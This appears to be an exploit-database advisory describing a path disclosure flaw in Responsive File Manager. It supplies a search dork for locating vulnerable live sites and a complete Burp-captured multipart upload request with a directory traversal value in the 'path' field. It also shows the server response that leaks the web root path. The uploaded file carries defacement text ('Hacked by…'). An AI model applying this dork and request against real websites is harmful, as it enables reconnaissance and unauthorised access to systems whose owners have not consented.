Responsive File Manager to Path Leaked

Risk: Medium
Local: No
Remote: Yes

Live Target: Author: L4663r666h05t In this case, you need Burpsuite. Note: if burpsuite is usually used to intercept, then here I am just trying to make it wrong directory then the response form will appear in the path of the victim's website using responsive file manager. Dork: inurl:/filemanager/css/ Exploit: /filemanager/dialog.php Step One: Step Two: Last Step: REQUEST: POST /assets/tinymce/filemanager/upload.php HTTP/1.1 Host: Content-Length: 439 Accept: application/json Cache-Control: no-cache Origin: X-Requested-With: XMLHttpRequest User-Agent: - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWwXMWsA3nGDOf2uC Referer: Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ae94241e4e4aa41cfe39c424950d3eac Connection: close ------WebKitFormBoundaryWwXMWsA3nGDOf2uC Content-Disposition: form-data; name="path" ../../../blablabla ------WebKitFormBoundaryWwXMWsA3nGDOf2uC Content-Disposition: form-data; name="path_thumb" ../thumbs/ ------WebKitFormBoundaryWwXMWsA3nGDOf2uC Content-Disposition: form-data; name="file"; filename="world.txt" Content-Type: text/plain Hacked by L4663r666h05t ------WebKitFormBoundaryWwXMWsA3nGDOf2uC-- RESPONSE: HTTP/1.1 200 OK Date: Tue, 05 Nov 2019 18:26:56 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 84 Content-Type: text/html; charset=UTF-8 wrong path (@/home/user/public_html/assets/tinymce/filemanager/upload.php#53) Path Leaked: /home/user/public_html/ Thanks to: Indonesian Code Party - Exploiter.ID



Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top